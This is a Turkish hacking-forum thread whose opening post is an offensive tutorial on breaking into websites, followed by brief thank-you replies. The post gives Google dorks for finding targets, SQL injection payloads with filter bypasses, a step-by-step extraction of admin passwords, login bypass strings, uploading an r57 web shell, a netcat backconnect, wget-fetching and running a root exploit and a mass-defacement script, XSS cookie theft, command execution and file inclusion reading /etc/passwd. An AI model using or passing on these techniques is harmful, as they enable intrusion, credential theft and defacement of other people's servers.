İPUCU

Web & Server Güvenliği Doğru web ve veritabanı sunucusu güvenliği sağlanmadan, bilgisayar korsanları hassas verilerinize erişebilir. Web, Sunucu ve veritabanı güvenliğini nasıl sağlayacağınızı buradan öğrenebilirsiniz.

Seçenekler

En Cok Bilinen Hack Yöntemleri

01-07-2013 09:20
#1
Special Player - ait Kullanıcı Resmi (Avatar)
Forumdan Uzaklaştırıldı
Üyelik tarihi:
01/2013
Nereden:
Love MyBB
Mesajlar:
259
Teşekkür (Etti):
1
Teşekkür (Aldı):
44
Konular:
101
Ticaret:
(0) %

Merhabalar Turk Hack TeaM İcin Özel Olarak Toparlanmiştir.

SQL İnjection ;

Webmasterların yaptıkları küçük kodlama hataları nedeniyle oluşan bu açık türü hackerlar tarafından kullanılan en popüler yöntemdir.
SQL injection kendi arasındada çeşitli bölümlere ayrılır.Asp,Asp.net,Php,Html sitelerde ayrı ayrı olarak uygulanır.Kullanılan komutlar birbirine benzerler.

1 ) String İnjection and Mode_Security_Bypass

Dork : "inurl:"sayfa.php?id=1" "intext:"Copyright © 2011 byahmet"
Exploit : -1’ /*!UnIoN*/ /*!SeLeCt*/ 1,2,(select group_concat(char(60,112,62),/*!table_name*/)+from+`information_schema`.`tables`),4,5,6 /*!and*/ ’x’=’y

Video linki : String inj ve mod_security bypass - YouTube

2 ) Postgre SQL İnjection and Shell Upload

Bu yöntem sayesinde admin paneline şifresiz giriş yaptıktan sonra shellimizi upload edip sunucuda root olduktan sonra masslarız.İstersekte rootkik kurarız veya downloader katarız

site.com/login.asp
site.com/login.aspx
site.com/yonetım.aspx
site.com/koordınator.aspx

siteye girdikten sonra komutlarımız şunlar çok kısa ve öz hiç bir şey bilmenize gerek yok bunu yapabilmek için.

k.adı : ’or’
şifre : ’or’


veya

email : ’or’1’=’1’

sadece bunu yazıp giriş yapabiliriz.

Video Linki :
deneme - YouTube
postgresql.avi - YouTube

3 ) Mysql İnjection

Mysql injection ise genellikle php tabanlı sitelerde olur.Version 4 ve 5 olmak üzere 2’ye ayrılır.Version 4 de tablo adlarını bulmamız tahmin işine bağlıdır.Genellikle sağlam bir wordlistle tablo isimlerine ulaşabiliriz veya kaynak kodlara bakarak birşeyler çıkarmaya bakarız.Bunlarda olmadı acutenix veya intelli tamperla sitenin dizinlerine bakarız.Aynı olma ihtimali yüksektir.Tabikide sitenin uzantısına göre felan değişen bir şey bu tablo adları.Version 5 de ise işimiz daha kolaydır.Kodları yazar direk tablo isimlerini alırız.Columnleri çekeriz.Ondan sonrada bilgileri çektikten sonra admin paneline ulaşır shellimizi atar.Backconnect olduktan sonra root olup masslarız veya root şifresini değişir.Kendimize beleş site açarız

Basit olarak MySQL İnjection komutları ;

site.com/index.php?id=1’a
You have en error ...
site.com/index.php?id=1+order+by+9--(site aynı)
site.com/index.php?id=1+order+by+10--(site SQL hatasını verdi.)
site.com/index.php?id=-1+union+select+1,2,3,4,5,6,7,8,9--(Sayılar yansıdı.Ex : 2,3)
site.com/index.php?id=-1+union+select+1,version(),3,4,5,6,7,8,9--
Version 5.1.40 Bumm
site.com/index.php?id=-1+union+select+1,group_concat(table_name),3,4,5,6, 7,8,9+from+information_schema.​​tables+where+table _schema=database()--
Tablolar yansıdı admin diye bir tablo gördük aboo heyecan bastı benide İnsan merak ediyor acaba bu admin tablosunda ne var hemen bakalım
site.com/index.php?id=-1+union+select+1,group_concat(column_name),3,4,5,6 ,7,8,9+from+information_schema​​.columns+where+tab le_name=’admin’--
Columnler yansıdı.(username,password,email)Bilgileri çekelim.
site.com/index.php?id=-1+union+select+1,group_concat(username,0x3a,passwo rd,0x3a,email),3,4,5,6,7,8,9+f​​rom+admin--
Bilgilerde yansıdı.
username : admin
password : 123456
site.com/admin.php

Panele girdik.Şimdi haberler kısmından veya galeri kısmında shellimizi atalım.Tamper data ile takip edelim nereye gidiyor veya benim gibi manual bulalım.

site.com/r57.php (Shellimizi atmışız
Backconnect olduk.
cmd>nc -vv -l -p 443>Bağlantıyı gerçekleştirdik.>ls -la>Dosyalar karşımızda>index.php config.php ... >wget site.com/exploit>chmod 777 exploit>./exploit>Root olduk.>id>uid=0 groupid=0>whoami>root>wget site.com/mass.pl>chmod 777 mass.pl>perl mass.pl atmak istediğimiz indexin yolu.

Video Linki : sqlinjshell.avi - YouTube

4-) Unhex-Hex olayı

Bazı sitelerde güvenlik duvarı olur.Ayar edebilir sizleri.Bunun için bypass yöntemleri var.


5-) Waf Bypass

S.a arkadaşlar bazı sitelerde komutları yazsanızda bilgiler karşınıza gelmez veya ne bilim bilgileri göstermez.Sitede bazı karakterlere karşı filtreleme vardır.Bunları aşmak için geliştirilmiş güzel bir yöntemdir.Waf Bypass.

Video Linki : waf bypass - YouTube

7 ) 406 not acceptle bypass

Bazı sitelerde komutu girerseniz sayıları yansıtmak için.406 ile karşılarsınız bunun içinde gerekli olan bypass yöntemiyle ilgili video çekmiştim.

Video : sqlbypass.avi - YouTube

8 ) Load_File komutu ile etc/passwd okuma

Video Linki : dosyaokuma.avi - YouTube

9 ) Blind(Kör) SQL

Dünyaca ünlü alışveriş,firma sitelerinde bulunan ve bana kalırsa en tehlikeli sql türüdür.

10 ) SEO SQL Injection

Html tabanlı sitelerde bazı arkadaşlar sql olmaz diyorlar.Ama çok büyük yanıldıklarının farkında değiller

site.com/index’a.html
site.com/index+order+by+1--.html

gibisinden devam ettireceksiniz.

11 ) Detay İnjection

Bazı sitelerdede sql bilgilerini sadece tek dosyadan tek linkten çeker.

12 ) MSSQL İnjection

Genellikle asp tabanlı serverlarda olur.Update etme , *** atma , admin şifresini alıp uzakmasaüstünden win sunucuyu hackleme , databaseyi silme gibi işlemlerin gerçekleştirebildiği güzel bir sql alt başlığıdır.

Bununla ilgili komutları daha sonra paylaşacağım.Fazla zamanım yok.

13 ) Mysql error based injection

Bununla ilgilide forumda kasvanın ve system-hackerın paylaşımlarını bulabilirsiniz.Ama havij bu işlemi sizin yerinize otomatik yapabilir.

14 ) Havij hakkında

Bana kalırsa havij ezik bir program.Kendi toolunu kodlamadıktan sonra SQL İnjectiondan keyif alamazsın.

1. Eksiklik waf bypass işlemi gerçekleştirmiyor.
2. Eksiklik 406 not acceptle bypass etmiyor.
3. Eksiklik string sql ve mode_security_bypass özelliği yok.
4. Eksiklik blind injectionda sanıldığı kadar iyi değil

XSS (Cross Site Scripting)

Xss sitedeki adminin **** bilgilerini almamıza yarayan , uyarı verdirmeye dayalı bir açık türüdür.En basit örneğiyle.

inurl:’’search.php’’ site:co.il
site.com/search.php?id=**********alert("hacked by bigeran")</script>
uyarıyı verdi.Direk arama kısmındanda aratabilirsiniz fark etmez.

Şimdi sniffer ı kurup bir dosyanın içine java kodumuzu gömdükten sonra admin sosyal çekmeye geliyor.Adminin linke tıklamasını sağlayıp **** yi aldıktan sonra.Siteye üye olduktan sonra **** mizi değiştirip admin olduktan sonra siteyi hackleyebiliriz.

RCE ( Remote Command Execution)

Uzaktan kod çalıştırmaya yarayan basit gibi görünen kısa zamanda amacımıza ulaşabileceğimiz bir açık türüdür.

inurl:’’faq.php?cmd’’
site.com/faq.php?cmd=ls -la (Linux komutları hayalinize kalmış )
curl veya wget ile shell çekip serverı ister rootlayın ister masslayın ister domain hack edin isterse scriptini kullanın.

Video : remote command execution - YouTube

LFİ(Lemote file inclusion)

Linux dosyalarını okumamızı sağlayan bir yöntemdir.

site.com/page.php?id=../../../../etc/passwd%00
site.com/page.php?id=../../../../proc/self/environ%00

ve tamper data ile shell upload edebiliriz.

Lfi bypass videosu priv8 sayılabilir belki.

Video : lfibypass.avi - YouTube

SYMLİNK ile CONFİG bilgilerini çekme

Video : symlink.avi - YouTube

Linux Root

Video : linux root.avi - YouTube

Bc2.php ile Backconnect

Video : bc2ilebc.avi - YouTube

Evet arkadaşlar devamı gelecek konunun daha iyi takip edilip anlaşılabilmesi için mesaj yazmayın lütfen.Bir sonraki konular :

Buffer overflow ile programda bug tespiti ile ücretsiz kullanma
****sploit ile karşı bilgisayara bağlanma
Windows root ve mass
Linux bypass yöntemleri detaylı
Sql injectionda çok daha detaylı bilgiler.
Php ile exploit kodlama ayrıntılı.
Hedef windows bilgisayarı uzak masaüstüne açıp ele geçirmek.



Evet Arkadaşlar Bu Makalenin Yarısı Bana Aittir. Videolar İse Bigeran Dostuma Aittir

İyi Forumlar

Konu Special Player tarafından (01-07-2013 12:15 Saat 12:15 ) değiştirilmiştir.
vatansever001, matutinal, cesiceyms Teşekkür etti.

01-07-2013 13:28
#2
Üyelik tarihi:
07/2012
Mesajlar:
998
Teşekkür (Etti):
697
Teşekkür (Aldı):
95
Konular:
81
Ticaret:
(0) %
Devamini bekliyoruz: )
01-07-2013 13:40
#3
Special Player - ait Kullanıcı Resmi (Avatar)
Forumdan Uzaklaştırıldı
Üyelik tarihi:
01/2013
Nereden:
Love MyBB
Mesajlar:
259
Teşekkür (Etti):
1
Teşekkür (Aldı):
44
Konular:
101
Ticaret:
(0) %
İnşallah Kardeşim
01-07-2013 16:17
#4
By Janke - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
05/2013
Nereden:
İzmir
Mesajlar:
154
Teşekkür (Etti):
15
Teşekkür (Aldı):
1
Konular:
10
Ticaret:
(0) %
Teşekkürler Devamını Bekleriz
01-07-2013 16:43
#5
TAKES - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
06/2013
Mesajlar:
26
Teşekkür (Etti):
20
Teşekkür (Aldı):
3
Konular:
2
Ticaret:
(0) %
tesekkurler
Kullanıcı İmzası
Dünyayı Dize Getiren Türkler...
01-07-2013 17:01
#6
Fearlessleon - ait Kullanıcı Resmi (Avatar)
- HARBİYELİ -
Üyelik tarihi:
02/2013
Nereden:
Hacking.py
Yaş:
29
Mesajlar:
6.676
Teşekkür (Etti):
1224
Teşekkür (Aldı):
1869
Konular:
1552
Ticaret:
(0) %
yararli konu
Kullanıcı İmzası
Bir gün yine yeniden..
01-07-2013 19:26
#7
byeren100 - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
07/2012
Nereden:
İstanbul
Mesajlar:
1.632
Teşekkür (Etti):
296
Teşekkür (Aldı):
137
Konular:
96
Ticaret:
(0) %
Teşekkürler
03-07-2013 07:36
#8
KursaT44 - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
01/2013
Nereden:
ADANA
Mesajlar:
1.844
Teşekkür (Etti):
207
Teşekkür (Aldı):
387
Konular:
120
Ticaret:
(0) %
LFInın açılımı Local File Injectıon dur
Kullanıcı İmzası
Taşı delen suyun gücü değil, sürekliliğidir.

ÇOK DEĞİŞMİŞSİN 2 YILDA THT ÇOOOK
04-07-2013 15:16
#9
ALcatraz' - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
05/2013
Nereden:
İstanbul
Mesajlar:
4.269
Teşekkür (Etti):
968
Teşekkür (Aldı):
1755
Konular:
1022
Ticaret:
(0) %
Kısa ve öz Ellerine sağlık.
Kullanıcı İmzası
En çok ne zoruma gidiyor biliyor musun? "Ülkem" diye kaydetmiştin beni telefonuna. Kalbimi parçalara ayırdın, hani vatan bölünmezdi?

Yokluğun bilinç altımdayken , varlığın kimin altında merak ediyorum.
04-07-2013 15:18
#10
BarisJKaraali - ait Kullanıcı Resmi (Avatar)
Forumdan Uzaklaştırıldı
Üyelik tarihi:
05/2013
Nereden:
Istanbul
Mesajlar:
2.677
Teşekkür (Etti):
54
Teşekkür (Aldı):
726
Konular:
186
Ticaret:
(0) %
Biliniyor bunlar yav
İyi ve yararlı konu olmuş sağolasın bro

Bookmarks


« Önceki Konu | Sonraki Konu »
Seçenekler

Yetkileriniz
Sizin Yeni Konu Acma Yetkiniz var yok
You may not post replies
Sizin eklenti yükleme yetkiniz yok
You may not edit your posts

BB code is Açık
Smileler Açık
[IMG] Kodları Açık
HTML-Kodları Kapalı
Trackbacks are Kapalı
Pingbacks are Kapalı
Refbacks are Kapalı